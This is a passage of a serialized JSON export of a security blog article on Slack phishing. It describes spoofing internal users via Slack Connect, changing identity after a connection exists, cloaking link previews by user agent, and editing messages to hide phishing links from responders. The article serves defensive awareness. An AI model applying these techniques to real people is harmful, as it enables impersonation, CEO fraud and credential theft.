achieved.",{"data":274845,"content":274846,"nodeType":169},{},[274847],{"data":274848,"marks":274849,"value":264586,"nodeType":173},{},[],{"data":274851,"content":274852,"nodeType":178},{},[274853],{"data":274854,"marks":274855,"value":264601,"nodeType":173},{},[],{"data":274857,"content":274858,"nodeType":178},{},[274859],{"data":274860,"marks":274861,"value":264608,"nodeType":173},{},[],{"data":274863,"content":274864,"nodeType":178},{},[274865],{"data":274866,"marks":274867,"value":264615,"nodeType":173},{},[],{"data":274869,"content":274870,"nodeType":178},{},[274871],{"data":274872,"marks":274873,"value":264622,"nodeType":173},{},[],{"data":274875,"content":274876,"nodeType":250},{},[274877,274886,274895],{"data":274878,"content":274879,"nodeType":254},{},[274880],{"data":274881,"content":274882,"nodeType":178},{},[274883],{"data":274884,"marks":274885,"value":264635,"nodeType":173},{},[],{"data":274887,"content":274888,"nodeType":254},{},[274889],{"data":274890,"content":274891,"nodeType":178},{},[274892],{"data":274893,"marks":274894,"value":264645,"nodeType":173},{},[],{"data":274896,"content":274897,"nodeType":254},{},[274898],{"data":274899,"content":274900,"nodeType":178},{},[274901],{"data":274902,"marks":274903,"value":264655,"nodeType":173},{},[],{"data":274905,"content":274906,"nodeType":178},{},[274907],{"data":274908,"marks":274909,"value":264662,"nodeType":173},{},[],{"data":274911,"content":274912,"nodeType":178},{},[274913,274916,274923,274926,274933,274936,274943],{"data":274914,"marks":274915,"value":264669,"nodeType":173},{},[],{"data":274917,"content":274918,"nodeType":186},{"uri":264672},[274919],{"data":274920,"marks":274921,"value":264678,"nodeType":173},{},[274922],{"type":194},{"data":274924,"marks":274925,"value":264682,"nodeType":173},{},[],{"data":274927,"content":274928,"nodeType":186},{"uri":264685},[274929],{"data":274930,"marks":274931,"value":264691,"nodeType":173},{},[274932],{"type":194},{"data":274934,"marks":274935,"value":264695,"nodeType":173},{},[],{"data":274937,"content":274938,"nodeType":186},{"uri":264698},[274939],{"data":274940,"marks":274941,"value":264704,"nodeType":173},{},[274942],{"type":194},{"data":274944,"marks":274945,"value":1477,"nodeType":173},{},[],{"data":274947,"content":274948,"nodeType":178},{},[274949],{"data":274950,"marks":274951,"value":274952,"nodeType":173},{},[],"However, in this article we’ll focus on a few techniques specific to Slack.",{"data":274954,"content":274957,"nodeType":312},{"target":274955},{"sys":274956},{"id":169040,"type":317,"linkType":318},[],{"data":274959,"content":274960,"nodeType":169},{},[274961],{"data":274962,"marks":274963,"value":264719,"nodeType":173},{},[],{"data":274965,"content":274966,"nodeType":178},{},[274967],{"data":274968,"marks":274969,"value":264726,"nodeType":173},{},[],{"data":274971,"content":274972,"nodeType":178},{},[274973],{"data":274974,"marks":274975,"value":264733,"nodeType":173},{},[],{"data":274977,"content":274978,"nodeType":235},{},[274979],{"data":274980,"marks":274981,"value":264740,"nodeType":173},{},[],{"data":274983,"content":274984,"nodeType":178},{},[274985],{"data":274986,"marks":274987,"value":274988,"nodeType":173},{},[],"IM applications often make use of friendly display names for organization and employee names as well as user-chosen handles. These often don’t need to be unique either. Consider the following Slack Connect request:",{"data":274990,"content":274994,"nodeType":312},{"target":274991},{"sys":274992},{"id":274993,"type":317,"linkType":318},"7MEljb1f6XzNRBEbOSsQXi",[],{"data":274996,"content":274997,"nodeType":178},{},[274998],{"data":274999,"marks":275000,"value":275001,"nodeType":173},{},[],"It’s not easy for a target user to tell if the user or organization requesting to connect is legitimate when they first receive this invitation. There’s also a curiosity incentive - you can’t see a first message from the user, so it’s tempting for the target user to accept in order to see the message, even if they then ignore it.",{"data":275003,"content":275004,"nodeType":178},{},[275005],{"data":275006,"marks":275007,"value":275008,"nodeType":173},{},[],"However, once an attacker has got a first connection, they have cleared the first hurdle. They can now launch attacks in future, not just attacks immediately following a successful connection, after the target user has forgotten they ever connected with the attacker (more on this later).",{"data":275010,"content":275011,"nodeType":235},{},[275012],{"data":275013,"marks":275014,"value":275015,"nodeType":173},{},[],"Spoofing an internal user",{"data":275017,"content":275018,"nodeType":178},{},[275019],{"data":275020,"marks":275021,"value":275022,"nodeType":173},{},[],"What’s more, there’s nothing stopping an external attacker from impersonating internal users/employees too. This is especially a concern if an attacker can social engineer their way into being invited into a channel.",{"data":275024,"content":275028,"nodeType":312},{"target":275025},{"sys":275026},{"id":275027,"type":317,"linkType":318},"5TaP25v80xMkA5e33yFIfX",[],{"data":275030,"content":275031,"nodeType":178},{},[275032],{"data":275033,"marks":275034,"value":275035,"nodeType":173},{},[],"While this particular example is less likely to be successful in a small channel, it’s much more of a concern if they change their user identity to replicate an internal employee or teammate and then direct message a member of the channel. DMing an individual channel member doesn’t require a new Slack connect invite so it’s much easier for an unsuspecting target to fall victim to social engineering in this way. ",{"data":275037,"content":275038,"nodeType":235},{},[275039],{"data":275040,"marks":275041,"value":275042,"nodeType":173},{},[],"Chameleon attack",{"data":275044,"content":275045,"nodeType":178},{},[275046],{"data":275047,"marks":275048,"value":275049,"nodeType":173},{},[],"A particularly interesting external attack capability is that an attacker can act as a chameleon and change their identity over time. Let’s say an external attacker achieves a successful connection with a potential target as an external entity. Maybe they exchange some innocuous communications and then leave the conversation to die. Perhaps the target even has Slack message retention settings enabled that delete the chat history after 90 days.",{"data":275051,"content":275052,"nodeType":178},{},[275053],{"data":275054,"marks":275055,"value":275056,"nodeType":173},{},[],"The attacker bides their time and then in the future, they completely change their Slack identity to impersonate an internal user and message the target again. The connection is already present so the message will come through like any other message, only this time it will appear from a completely different identity. It’s quite possible that the target could be fooled into believing the message is from the internal user. ",{"data":275058,"content":275059,"nodeType":178},{},[275060],{"data":275061,"marks":275062,"value":275063,"nodeType":173},{},[],"This could be particularly dangerous in CEO fraud attacks. An attacker could forge connections with finance employees ahead of time for seemingly legitimate and innocuous means and then later use those to send Slack messages spoofing the CEO.",{"data":275065,"content":275069,"nodeType":312},{"target":275066},{"sys":275067},{"id":275068,"type":317,"linkType":318},"51TYXiOwQw0D6BYCzu0em4",[],{"data":275071,"content":275075,"nodeType":312},{"target":275072},{"sys":275073},{"id":275074,"type":317,"linkType":318},"6ZQ6iFu11NnXOP4EMAgxji",[],{"data":275077,"content":275078,"nodeType":178},{},[275079],{"data":275080,"marks":275081,"value":275082,"nodeType":173},{},[],"All the examples given so far are possible as an external attacker making Slack connect invites, so they work as the initial access phase of the kill chain. However, if an attacker gains control of an internal Slack user account for the target tenant, or the attacker is a malicious insider (e.g. a disgruntled employee), then they don’t even need to worry about achieving an initial connection request. Under a default configuration, they could change their name and photo to impersonate the CEO immediately and message anyone they like. However, this is moving into the lateral movement phase of the kill chain.",{"data":275084,"content":275085,"nodeType":169},{},[275086],{"data":275087,"marks":275088,"value":264835,"nodeType":173},{},[],{"data":275090,"content":275091,"nodeType":178},{},[275092,275095,275099,275102,275106],{"data":275093,"marks":275094,"value":264842,"nodeType":173},{},[],{"data":275096,"marks":275097,"value":264847,"nodeType":173},{},[275098],{"type":194},{"data":275100,"marks":275101,"value":264851,"nodeType":173},{},[],{"data":275103,"marks":275104,"value":264856,"nodeType":173},{},[275105],{"type":194},{"data":275107,"marks":275108,"value":264860,"nodeType":173},{},[],{"data":275110,"content":275111,"nodeType":178},{},[275112],{"data":275113,"marks":275114,"value":264867,"nodeType":173},{},[],{"data":275116,"content":275117,"nodeType":235},{},[275118],{"data":275119,"marks":275120,"value":264874,"nodeType":173},{},[],{"data":275122,"content":275123,"nodeType":178},{},[275124],{"data":275125,"marks":275126,"value":275127,"nodeType":173},{},[],"We’ll start with a common traditional link forging scenario to see how Slack handles that, then show how link previews change the threat.",{"data":275129,"content":275130,"nodeType":178},{},[275131],{"data":275132,"marks":275133,"value":275134,"nodeType":173},{},[],"Here, we can see forging a link is permitted by Slack, but at least the real domain is shown to the user along with an overt warning.",{"data":275136,"content":275140,"nodeType":312},{"target":275137},{"sys":275138},{"id":275139,"type":317,"linkType":318},"3SDhqamQqXLfFqD8W1b37V",[],{"data":275142,"content":275146,"nodeType":312},{"target":275143},{"sys":275144},{"id":275145,"type":317,"linkType":318},"5yfDUdZ4F6zrp7AGnMGD5b",[],{"data":275148,"content":275149,"nodeType":178},{},[275150],{"data":275151,"marks":275152,"value":275153,"nodeType":173},{},[],"On the other hand, if we use friendly text to mask the true URL, we no longer get a warning when clicking the link. However, it’s still possible to see the real URL via a mouseover, so this doesn’t really differ from traditional email phishing scenarios. Without any context of the link, it’s likely a security conscious user will hover-over to see what the link points to.",{"data":275155,"content":275159,"nodeType":312},{"target":275156},{"sys":275157},{"id":275158,"type":317,"linkType":318},"3KCRJ9HIJimLX9vzJVHq1C",[],{"data":275161,"content":275162,"nodeType":235},{},[275163],{"data":275164,"marks":275165,"value":275166,"nodeType":173},{},[],"Abusing link previews using an internal account ",{"data":275168,"content":275169,"nodeType":178},{},[275170],{"data":275171,"marks":275172,"value":275173,"nodeType":173},{},[],"It gets more interesting when we use links that Slack is able to unfurl to provide a link preview. We’re going to show how this works with full link previews first. By default, full previews only show for messages from internal users. To make the explanation easier, we’ll show full previews first but then we’ll show the difference with limited previews in external messages afterwards and thus show how it impacts external phishing attacks in the initial access phase.",{"data":275175,"content":275176,"nodeType":178},{},[275177],{"data":275178,"marks":275179,"value":275180,"nodeType":173},{},[],"Here we’ll show a legitimate example of posting one of our own blogs where Slack helpfully unfurls the URL and gives some context to the link as a preview:",{"data":275182,"content":275186,"nodeType":312},{"target":275183},{"sys":275184},{"id":275185,"type":317,"linkType":318},"7nknMRtdXGlupYom31kKor",[],{"data":275188,"content":275189,"nodeType":178},{},[275190],{"data":275191,"marks":275192,"value":275193,"nodeType":173},{},[],"This is very useful for the user and, despite the fact you can still see the real link clearly via a hover-over, a user is much less likely to check a link when they’ve already had a seemingly legitimate preview context displayed to them. ",{"data":275195,"content":275196,"nodeType":178},{},[275197],{"data":275198,"marks":275199,"value":264942,"nodeType":173},{},[],{"data":275201,"content":275202,"nodeType":178},{},[275203],{"data":275204,"marks":275205,"value":275206,"nodeType":173},{},[],"The obvious attack scenario is to minimize the link display text so it’s not noticeable and hard to hover-over and then forge a different link preview for Slack than what is given to the user when they click the link. Then when the user clicks the link, they’ll be directed to our phishing page instead. ",{"data":275208,"content":275209,"nodeType":178},{},[275210],{"data":275211,"marks":275212,"value":275213,"nodeType":173},{},[],"We can do this through using a single character as the link display text and then performing user agent specific processing of web requests. For example, Slack unfurling uses a user agent like the following:",{"data":275215,"content":275216,"nodeType":178},{},[275217],{"data":275218,"marks":275219,"value":275221,"nodeType":173},{},[275220],{"type":13816},"Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)",{"data":275223,"content":275224,"nodeType":178},{},[275225,275229],{"data":275226,"marks":275227,"value":275228,"nodeType":173},{},[],"Therefore, without even requiring much sophistication, we can use some simple python code to perform a redirect to a legitimate source when our web request handler sees this user agent. However, when a target user visits using a normal web browser we instead return a malicious page. The example python code below redirects to benign content for a Slack preview, while serving malicious content otherwise:",{"data":275230,"marks":275231,"value":275233,"nodeType":173},{},[275232],{"type":370},"    ",{"data":275235,"content":275239,"nodeType":312},{"target":275236},{"sys":275237},{"id":275238,"type":317,"linkType":318},"4VHFyInQfa3tdvJO4rnnQL",[],{"data":275241,"content":275242,"nodeType":178},{},[275243],{"data":275244,"marks":275245,"value":275246,"nodeType":173},{},[],"The end result of this is that the user sees a nice friendly link preview legitimately produced by Slack and Google Docs in real time, whereas if they click the link they’ll be taken to our phishing page instead. ",{"data":275248,"content":275249,"nodeType":178},{},[275250],{"data":275251,"marks":275252,"value":265010,"nodeType":173},{},[],{"data":275254,"content":275258,"nodeType":312},{"target":275255},{"sys":275256},{"id":275257,"type":317,"linkType":318},"3QaFhW1otbJpzMI9ff5R4F",[],{"data":275260,"content":275264,"nodeType":312},{"target":275261},{"sys":275262},{"id":275263,"type":317,"linkType":318},"6ZFu92OSmI7miSGz8QwwtV",[],{"data":275266,"content":275267,"nodeType":178},{},[275268],{"data":275269,"marks":275270,"value":275271,"nodeType":173},{},[],"Using a small period as the display text for the hyperlink means it is difficult for the user to notice and hover-over to see Slack pop-up the true domain as we saw earlier. While they can still hover over the link preview itself, this only shows the real domain in the taskbar in the bottom left, which is only noticeable if you intentionally look for it. ",{"data":275273,"content":275274,"nodeType":178},{},[275275],{"data":275276,"marks":275277,"value":275278,"nodeType":173},{},[],"Given normal links in Slack show the domain above the mouse, users aren’t used to looking for the link here and, combined with the friendly link preview, it’s much less likely a target user will realize this is a phishing attack.",{"data":275280,"content":275281,"nodeType":235},{},[275282],{"data":275283,"marks":275284,"value":275285,"nodeType":173},{},[],"Abusing link previews with an external account ",{"data":275287,"content":275288,"nodeType":178},{},[275289],{"data":275290,"marks":275291,"value":275292,"nodeType":173},{},[],"What we’ve just shown is the behavior for a message from an internal user. Slack doesn’t fully unfurl a link by default, however, if this was combined with external messaging as we saw earlier. It does still show a partial link preview though and therefore this attack is still possible.",{"data":275294,"content":275295,"nodeType":178},{},[275296],{"data":275297,"marks":275298,"value":275299,"nodeType":173},{},[],"The only real difference is it doesn’t show the image part of the preview and, instead, shows a notice to the user that it’s external and gives them the option to click to show the image preview as well. If the user clicks to show the image preview, it converts to the same full preview with the image we saw above. In this case, we can see an example of chaining the original external user spoofing attack with a link preview spoofing attack below:",{"data":275301,"content":275305,"nodeType":312},{"target":275302},{"sys":275303},{"id":275304,"type":317,"linkType":318},"4IkX0LI0bB36CxNlHYHRHs",[],{"data":275307,"content":275308,"nodeType":178},{},[275309],{"data":275310,"marks":275311,"value":275312,"nodeType":173},{},[],"While this is slightly more problematic for an attacker than the internal functionality for link previews, it’s still very useful as a social engineering technique and arguably the option to click “just show this one” adds to the legitimacy. The reason is the user may use this as a way to get context on what the link is, instead of looking for the underlying URL. Otherwise, clicking the link still takes the user to the phishing page without any other warnings the same as for internal messages.",{"data":275314,"content":275318,"nodeType":312},{"target":275315},{"sys":275316},{"id":275317,"type":317,"linkType":318},"2ug8ozbhRM3Xg8nhasJ1er",[],{"data":275320,"content":275321,"nodeType":235},{},[275322],{"data":275323,"marks":275324,"value":275325,"nodeType":173},{},[],"Cleaning your tracks",{"data":275327,"content":275328,"nodeType":178},{},[275329],{"data":275330,"marks":275331,"value":265056,"nodeType":173},{},[],{"data":275333,"content":275334,"nodeType":178},{},[275335],{"data":275336,"marks":275337,"value":275338,"nodeType":173},{},[],"As an attacker, I could make a tiny change to my message to replace the malicious link with the legitimate link I was spoofing for the link preview if I got the sense the target was getting suspicious. Then, if an incident responder comes to investigate, the malicious link is now gone and the message itself appears identical, covering my tracks. Other than being able to see the message has been edited, it’s no longer easy to see this was a phishing attack or where the phishing link pointed to. This is definitely a useful capability that isn’t usually possible with email phishing! \n\nSee this minor change reflected below, making the original phishing message appear innocuous due to the replacement of the phishing URL with a legitimate URL:",{"data":275340,"content":275344,"nodeType":312},{"target":275341},{"sys":275342},{"id":275343,"type":317,"linkType":318},"32lWR3sObuIYvhSDUPIPAh",[],{"data":275346,"content":275347,"nodeType":169},{},[275348],{"data":275349,"marks":275350,"value":15539,"nodeType":173},{},[],{"data":275352,"content":275353,"nodeType":178},{},[275354],{"data":275355,"marks":275356,"value":265089,"nodeType":173},{},[],{"data":275358,"content":275359,"nodeType":250},{},[275360,275370,275379,275388],{"data":275361,"content":275362,"nodeType":254},{},[275363],{"data":275364,"content":275365,"nodeType":178},{},[275366],{"data":275367,"marks":275368,"value":275369,"nodeType":173},{},[],"IM apps like Slack are now external phishing and social engineering vectors, not just internal ones",{"data":275371,"content":275372,"nodeType":254},{},[275373],{"data":275374,"content":275375,"nodeType":178},{},[275376],{"data":275377,"marks":275378,"value":265112,"nodeType":173},{},[],{"data":275380,"content":275381,"nodeType":254},{},[275382],{"data":275383,"content":275384,"nodeType":178},{},[275385],{"data":275386,"marks":275387,"value":265122,"nodeType":173},{},[],{"data":275389,"content":275390,"nodeType":254},{},[275391],{"data":275392,"content":275393,"nodeType":178},{},[275394],{"data":275395,"marks":275396,"value":275397,"nodeType":173},{},[],"Malicious Slack messages can be modified later to replace the phishing link to cover up the attack",{"data":275399,"content":275400,"nodeType":169},{},[275401],{"data":275402,"marks":275403,"value":40632,"nodeType":173},{},[],{"data":275405,"content":275406,"nodeType":178},{},[275407],{"data":275408,"marks":275409,"value":265145,"nodeType":173},{},[],{"data":275411,"content":275412,"nodeType":178},{},[275413],{"data":275414,"marks":275415,"value":265152,"nodeType":173},{},[],{"data":275417,"content":275418,"nodeType":178},{},[275419],{"data":275420,"marks":275421,"value":275422,"nodeType":173},{},[],"In this article, we highlighted a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Slack in the initial access phase of the kill chain. In the next article, we’ll look at how once an attacker has a foothold on Slack, new attack possibilities open up that allow for persistence and lateral movement to be achieved.",{"data":275424,"content":275425,"nodeType":178},{},[275426],{"data":275427,"marks":275428,"value":275429,"nodeType":173},{},[],"While this article focused on Slack specifically, similar attacks may be possible for other IM apps as well. Going forwards, it will be important for organizations to factor in these types of attacks into their security strategies.",{"data":275431,"content":275432,"nodeType":178},{},[275433,275437,275445],{"data":275434,"marks":275435,"value":275436,"nodeType":173},{},[],"In our ",{"data":275438,"content":275441,"nodeType":1698},{"target":275439},{"sys":275440},{"id":264515,"type":317,"linkType":318},[275442],{"data":275443,"marks":275444,"value":274839,"nodeType":173},{},[],{"data":275446,"marks":275447,"value":275448,"nodeType":173},{},[],", we’ll talk about how to use Slack to gain persistence and move laterally across the organization. ",{"data":275450,"content":275453,"nodeType":312},{"target":275451},{"sys":275452},{"id":209109,"type":317,"linkType":318},[],{"data":275455,"content":275456,"nodeType":178},{},[275457],{"data":275458,"marks":275459,"value":37,"nodeType":173},{},[],"In this article, we’ll demonstrate how IM apps, specifically Slack, are an increasingly attractive target for a range of phishing & social engineering attacks.",{"items":275462},[275463,275465],{"sys":275464,"name":505},{"id":504},{"sys":275466,"name":26137},{"id":26136},{"items":275468},[275469],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":275470},{"url":8615},{"__typename":1528,"sys":275472,"content":275473,"title":268752,"synopsis":267888,"hashTags":118,"publishedDate":268753,"slug":268754,"tagsCollection":276232,"authorsCollection":276238},{"id":267879},{"json":275474},{"nodeType":165,"data":275475,"content":275476},{},[275477,275483,275489,275517,275523,275529,275545,275551,275557,275563,275587,275593,275599,275612,275618,275624,275654,275660,275666,275672,275678,275684,275689,275695,275701,275707,275714,275720,275736,275742,275748,275754,275760,275766,275772,275778,275784,275790,275795,275801,275817,275823,275839,275844,275849,275854,275860,275866,275872,275877,275882,275888,275894,275900,275906,275912,275917,275933,275949,275955,275960,275965,275971,275977,275983,275989,276010,276015,276020,276026,276032,276038,276048,276053,276059,276064,276069,276075,276081,276087,276092,276097,276103,276109,276214,276220,276226],{"nodeType":178,"data":275478,"content":275479},{},[275480],{"nodeType":173,"value":267888,"marks":275481,"data":275482},[],{},{"nodeType":178,"data":275484,"content":275485},{},[275486],{"nodeType":173,"value":267895,"marks":275487,"data":275488},[],{},{"nodeType":178,"data":275490,"content":275491},{},[275492,275495,275502,275505,275514],{"nodeType":173,"value":267902,"marks":275493,"data":275494},[],{},{"nodeType":186,"data":275496,"content":275497},{"uri":88239},[275498],{"nodeType":173,"value":88742,"marks":275499,"data":275501},[275500],{"type":194},{},{"nodeType":173,"value":267913,"marks":275503,"data":275504},[],{},{"nodeType":1698,"data":275506,"content":275509},{"target":275507},{"sys":275508},{"id":228244,"type":317,"linkType":318},[275510],{"nodeType":173,"value":252406,"marks":275511,"data":275513},[275512],{"type":194},{},{"nodeType":173,"value":197,"marks":275515,"data":275516},[],{},{"nodeType":178,"data":275518,"content":275519},{},[275520],{"nodeType":173,"value":267932,"marks":275521,"data":275522},[],{},{"nodeType":169,"data":275524,"content":275525},{},[275526],{"nodeType":173,"value":267939,"marks":275527,"data":275528},[],{},{"nodeType":178,"data":275530,"content":275531},{},[275532,275535,275542],{"nodeType":173,"value":15816,"marks":275533,"data":275534},[],{},{"nodeType":186,"data":275536,"content":275537},{"uri":144083},[275538],{"nodeType":173,"value":267952,"marks":275539,"data":275541},[275540],{"type":194},{},{"nodeType":173,"value":267957,"marks":275543,"data":275544},[],{},{"nodeType":178,"data":275546,"content":275547},{},[275548],{"nodeType":173,"value":267964,"marks":275549,"data":275550},[],{},{"nodeType":169,"data":275552,"content":275553},{},[275554],{"nodeType":173,"value":267971,"marks":275555,"data":275556},[],{},{"nodeType":178,"data":275558,"content":275559},{},[275560],{"nodeType":173,"value":267978,"marks":275561,"data":275562},[],{},{"nodeType":178,"data":275564,"content":275565},{},[275566,275569,275576,275579,275584],{"nodeType":173,"value":96646,"marks":275567,"data":275568},[],{},{"nodeType":186,"data":275570,"content":275571},{"uri":59335},[275572],{"nodeType":173,"value":208649,"marks":275573,"data":275575},[275574],{"type":194},{},{"nodeType":173,"value":267995,"marks":275577,"data":275578},[],{},{"nodeType":173,"value":267999,"marks":275580,"data":275583},[275581,275582],{"type":1646},{"type":370},{},{"nodeType":173,"value":268005,"marks":275585,"data":275586},[],{},{"nodeType":169,"data":275588,"content":275589},{},[275590],{"nodeType":173,"value":259540,"marks":275591,"data":275592},[],{},{"nodeType":178,"data":275594,"content":275595},{},[275596],{"nodeType":173,"value":268018,"marks":275597,"data":275598},[],{},{"nodeType":178,"data":275600,"content":275601},{},[275602,275605,275609],{"nodeType":173,"value":268025,"marks":275603,"data":275604},[],{},{"nodeType":173,"value":268029,"marks":275606,"data":275608},[275607],{"type":194},{},{"nodeType":173,"value":268034,"marks":275610,"data":275611},[],{},{"nodeType":178,"data":275613,"content":275614},{},[275615],{"nodeType":173,"value":268041,"marks":275616,"data":275617},[],{},{"nodeType":178,"data":275619,"content":275620},{},[275621],{"nodeType":173,"value":268048,"marks":275622,"data":275623},[],{},{"nodeType":246189,"data":275625,"content":275626},{},[275627,275636,275645],{"nodeType":254,"data":275628,"content":275629},{},[275630],{"nodeType":178,"data":275631,"content":275632},{},[275633],{"nodeType":173,"value":268061,"marks":275634,"data":275635},[],{},{"nodeType":254,"data":275637,"content":275638},{},[275639],{"nodeType":178,"data":275640,"content":275641},{},[275642],{"nodeType":173,"value":268071,"marks":275643,"data":275644},[],{},{"nodeType":254,"data":275646,"content":275647},{},[275648],{"nodeType":178,"data":275649,"content":275650},{},[275651],{"nodeType":173,"value":268081,"marks":275652,"data":275653},[],{},{"nodeType":235,"data":275655,"content":275656},{},[275657],{"nodeType":173,"value":268088,"marks":275658,"data":275659},[],{},{"nodeType":178,"data":275661,"content":275662},{},[275663],{"nodeType":173,"value":268095,"marks":275664,"data":275665},[],{},{"nodeType":178,"data":275667,"content":275668},{},[275669],{"nodeType":173,"value":268102,"marks":275670,"data":275671},[],{},{"nodeType":178,"data":275673,"content":275674},{},[275675],{"nodeType":173,"value":268109,"marks":275676,"data":275677},[],{},{"nodeType":178,"data":275679,"content":275680},{},[275681],{"nodeType":173,"value":268116,"marks":275682,"data":275683},[],{},{"nodeType":312,"data":275685,"content":275688},{"target":275686},{"sys":275687},{"id":268123,"type":317,"linkType":318},[],{"nodeType":235,"data":275690,"content":275691},{},[275692],{"nodeType":173,"value":268129,"marks":275693,"data":275694},[],{},{"nodeType":178,"data":275696,"content":275697},{},[275698],{"nodeType":173,"value":268136,"marks":275699,"data":275700},[],{},{"nodeType":178,"data":275702,"content":275703},{},[275704],{"nodeType":173,"value":268143,"marks":275705,"data":275706},[],{},{"nodeType":178,"data":275708,"content":275709},{},[275710],{"nodeType":173,"value":268150,"marks":275711,"data":275713},[275712],{"type":370},{},{"nodeType":235,"data":275715,"content":275716},{},[275717],{"nodeType":173,"value":268158,"marks":275718,"data":275719},[],{},{"nodeType":178,"data":275721,"content":275722},{},[275723,275726,275733],{"nodeType":173,"value":268165,"marks":275724,"data":275725},[],{},{"nodeType":186,"data":275727,"content":275728},{"uri":268170},[275729],{"nodeType":173,"value":268173,"marks":275730,"data":275732},[275731],{"type":194},{},{"nodeType":173,"value":268178,"marks":275734,"data":275735},[],{},{"nodeType":178,"data":275737,"content":275738},{},[275739],{"nodeType":173,"value":268185,"marks":275740,"data":275741},[],{},{"nodeType":178,"data":275743,"content":275744},{},[275745],{"nodeType":173,"value":268192,"marks":275746,"data":275747},[],{},{"nodeType":169,"data":275749,"content":275750},{},[275751],{"nodeType":173,"value":268199,"marks":275752,"data":275753},[],{},{"nodeType":178,"data":275755,"content":275756},{},[275757],{"nodeType":173,"value":268206,"marks":275758,"data":275759},[],{},{"nodeType":178,"data":275761,"content":275762},{},[275763],{"nodeType":173,"value":268213,"marks":275764,"data":275765},[],{},{"nodeType":178,"data":275767,"content":275768},{},[275769],{"nodeType":173,"value":268220,"marks":275770,"data":275771},[],{},{"nodeType":178,"data":275773,"content":275774},{},[275775],{"nodeType":173,"value":268227,"marks":275776,"data":275777},[],{},{"nodeType":178,"data":275779,"content":275780},{},[275781],{"nodeType":173,"value":268234,"marks":275782,"data":275783},[],{},{"nodeType":178,"data":275785,"content":275786},{},[275787],{"nodeType":173,"value":268241,"marks":275788,"data":275789},[],{},{"nodeType":312,"data":275791,"content":275794},{"target":275792},{"sys":275793},{"id":268248,"type":317,"linkType":318},[],{"nodeType":169,"data":275796,"content":275797},{},[275798],{"nodeType":173,"value":268254,"marks":275799,"data":275800},[],{},{"nodeType":178,"data":275802,"content":275803},{},[275804,275807,275814],{"nodeType":173,"value":268261,"marks":275805,"data":275806},[],{},{"nodeType":186,"data":275808,"content":275809},{"uri":197841},[275810],{"nodeType":173,"value":268268,"marks":275811,"data":275813},[275812],{"type":194},{},{"nodeType":173,"value":268273,"marks":275815,"data":275816},[],{},{"nodeType":235,"data":275818,"content":275819},{},[275820],{"nodeType":173,"value":268280,"marks":275821,"data":275822},[],{},{"nodeType":178,"data":275824,"content":275825},{},[275826,275829,275836],{"nodeType":173,"value":268287,"marks":275827,"data":275828},[],{},{"nodeType":186,"data":275830,"content":275831},{"uri":268292},[275832],{"nodeType":173,"value":268292,"marks":275833,"data":275835},[275834],{"type":194},{},{"nodeType":173,"value":268299,"marks":275837,"data":275838},[],{},{"nodeType":312,"data":275840,"content":275843},{"target":275841},{"sys":275842},{"id":268306,"type":317,"linkType":318},[],{"nodeType":312,"data":275845,"content":275848},{"target":275846},{"sys":275847},{"id":268312,"type":317,"linkType":318},[],{"nodeType":312,"data":275850,"content":275853},{"target":275851},{"sys":275852},{"id":268318,"type":317,"linkType":318},[],{"nodeType":235,"data":275855,"content":275856},{},[275857],{"nodeType":173,"value":268324,"marks":275858,"data":275859},[],{},{"nodeType":178,"data":275861,"content":275862},{},[275863],{"nodeType":173,"value":268331,"marks":275864,"data":275865},[],{},{"nodeType":178,"data":275867,"content":275868},{},[275869],{"nodeType":173,"value":268338,"marks":275870,"data":275871},[],{},{"nodeType":312,"data":275873,"content":275876},{"target":275874},{"sys":275875},{"id":268345,"type":317,"linkType":318},[],{"nodeType":312,"data":275878,"content":275881},{"target":275879},{"sys":275880},{"id":268351,"type":317,"linkType":318},[],{"nodeType":169,"data":275883,"content":275884},{},[275885],{"nodeType":173,"value":268357,"marks":275886,"data":275887},[],{},{"nodeType":178,"data":275889,"content":275890},{},[275891],{"nodeType":173,"value":268364,"marks":275892,"data":275893},[],{},{"nodeType":178,"data":275895,"content":275896},{},[275897],{"nodeType":173,"value":268371,"marks":275898,"data":275899},[],{},{"nodeType":235,"data":275901,"content":275902},{},[275903],{"nodeType":173,"value":268378,"marks":275904,"data":275905},[],{},{"nodeType":178,"data":275907,"content":275908},{},[275909],{"nodeType":173,"value":268385,"marks":275910,"data":275911},[],{},{"nodeType":312,"data":275913,"content":275916},{"target":275914},{"sys":275915},{"id":268392,"type":317,"linkType":318},[],{"nodeType":178,"data":275918,"content":275919},{},[275920,275923,275930],{"nodeType":173,"value":268398,"marks":275921,"data":275922},[],{},{"nodeType":186,"data":275924,"content":275925},{"uri":259860},[275926],{"nodeType":173,"value":259866,"marks":275927,"data":275929},[275928],{"type":194},{},{"nodeType":173,"value":268409,"marks":275931,"data":275932},[],{},{"nodeType":178,"data":275934,"content":275935},{},[275936,275939,275946],{"nodeType":173,"value":268416,"marks":275937,"data":275938},[],{},{"nodeType":186,"data":275940,"content":275941},{"uri":197917},[275942],{"nodeType":173,"value":268423,"marks":275943,"data":275945},[275944],{"type":194},{},{"nodeType":173,"value":268428,"marks":275947,"data":275948},[],{},{"nodeType":178,"data":275950,"content":275951},{},[275952],{"nodeType":173,"value":268435,"marks":275953,"data":275954},[],{},{"nodeType":312,"data":275956,"content":275959},{"target":275957},{"sys":275958},{"id":268442,"type":317,"linkType":318},[],{"nodeType":312,"data":275961,"content":275964},{"target":275962},{"sys":275963},{"id":268448,"type":317,"linkType":318},[],{"nodeType":178,"data":275966,"content":275967},{},[275968],{"nodeType":173,"value":268454,"marks":275969,"data":275970},[],{},{"nodeType":235,"data":275972,"content":275973},{},[275974],{"nodeType":173,"value":268461,"marks":275975,"data":275976},[],{},{"nodeType":178,"data":275978,"content":275979},{},[275980],{"nodeType":173,"value":268468,"marks":275981,"data":275982},[],{},{"nodeType":178,"data":275984,"content":275985},{},[275986],{"nodeType":173,"value":268475,"marks":275987,"data":275988},[],{},{"nodeType":250,"data":275990,"content":275991},{},[275992,276001],{"nodeType":254,"data":275993,"content":275994},{},[275995],{"nodeType":178,"data":275996,"content":275997},{},[275998],{"nodeType":173,"value":268488,"marks":275999,"data":276000},[],{},{"nodeType":254,"data":276002,"content":276003},{},[276004],{"nodeType":178,"data":276005,"content":276006},{},[276007],{"nodeType":173,"value":268498,"marks":276008,"data":276009},[],{},{"nodeType":312,"data":276011,"content":276014},{"target":276012},{"sys":276013},{"id":268505,"type":317,"linkType":318},[],{"nodeType":312,"data":276016,"content":276019},{"target":276017},{"sys":276018},{"id":268511,"type":317,"linkType":318},[],{"nodeType":178,"data":276021,"content":276022},{},[27602